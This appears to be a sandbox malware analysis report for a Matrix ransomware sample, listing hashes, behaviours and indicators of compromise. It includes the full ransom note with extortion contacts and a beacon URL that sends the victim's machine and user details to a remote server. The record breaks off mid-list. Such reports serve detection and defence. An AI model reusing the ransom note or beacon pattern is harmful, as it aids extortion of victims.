matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
150s
max time network
124s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
13-02-2024 05:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Size

1.2MB
MD5

c82d64850d35cc6a536c11adbd261cf6
SHA1

9f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512

777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
SSDEEP

24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files\Google\Chrome\Application\#KOK8_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 66FCC65BF7EE05F7\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 66FCC65BF7EE05F7\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 4Bz3kIsT\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File created	C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Public\Music\Sample Music\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Chess\fr-FR\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Package Cache\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\packages\vcRuntimeMinimum_x86\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Purble Place\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Recovery\add7a402-9b9f-11ee-a130-ac12cddc57f5\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Chess\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Google\Update\Install\{F2D1DCEA-3974-4AE2-AC88-A893D86175E3}\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Public\Libraries\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jc9ad0k2.default-release\storage\permanent\chrome\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
HTTP URL	5	http://fredstat.000webhostapp.com/addrecord.php?apikey=kok8_api_key&compuser=AILVMYUM\|Admin&sid=2XRJB5TcgMJsn6i0&phase=66FCC65BF7EE05F7\|3845\|1GB
File created	C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Hearts\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Chess\ja-JP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\More Games\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jre7\lib\fonts\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Favorites\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Users\Admin\Documents\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3296 bcdedit.exe
2348 bcdedit.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 2460 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

sOCkujKF64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS sOCkujKF64.exe

pid	process
3296	bcdedit.exe
2348	bcdedit.exe

flow	pid	process
9	2460	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	sOCkujKF64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

sOCkujKF64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	sOCkujKF64.exe

Executes dropped EXE 64 IoCs

Processes:

NWaVfX3D.exesOCkujKF.exesOCkujKF64.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exesOCkujKF.exe

pid	process
2344	NWaVfX3D.exe
852	sOCkujKF.exe
2760	sOCkujKF64.exe
2412	sOCkujKF.exe
1176	sOCkujKF.exe
2632	sOCkujKF.exe
2268	sOCkujKF.exe
3232	sOCkujKF.exe
2316	sOCkujKF.exe
3104	sOCkujKF.exe
2088	sOCkujKF.exe
2236	sOCkujKF.exe
1952	sOCkujKF.exe
776	sOCkujKF.exe
3544	sOCkujKF.exe
4292	sOCkujKF.exe
4324	sOCkujKF.exe
4428	sOCkujKF.exe
4456	sOCkujKF.exe
4548	sOCkujKF.exe
4572	sOCkujKF.exe
4656	sOCkujKF.exe
4688	sOCkujKF.exe
4788	sOCkujKF.exe
4808	sOCkujKF.exe
4904	sOCkujKF.exe
4928	sOCkujKF.exe
5012	sOCkujKF.exe
5044	sOCkujKF.exe
3276	sOCkujKF.exe
1144	sOCkujKF.exe
3996	sOCkujKF.exe
3964	sOCkujKF.exe
2372	sOCkujKF.exe
2412	sOCkujKF.exe
3368	sOCkujKF.exe
108	sOCkujKF.exe
2112	sOCkujKF.exe
1884	sOCkujKF.exe
1536	sOCkujKF.exe
692	sOCkujKF.exe
3836	sOCkujKF.exe
1420	sOCkujKF.exe
712	sOCkujKF.exe
2548	sOCkujKF.exe
3920	sOCkujKF.exe
3912	sOCkujKF.exe
2672	sOCkujKF.exe
528	sOCkujKF.exe
968	sOCkujKF.exe
2516	sOCkujKF.exe
1912	sOCkujKF.exe
1112	sOCkujKF.exe
440	sOCkujKF.exe
2596	sOCkujKF.exe
2876	sOCkujKF.exe
3324	sOCkujKF.exe
2304	sOCkujKF.exe
1456	sOCkujKF.exe
3316	sOCkujKF.exe
812	sOCkujKF.exe
3924	sOCkujKF.exe
3444	sOCkujKF.exe
3880	sOCkujKF.exe

Loads dropped DLL 64 IoCs

Processes:

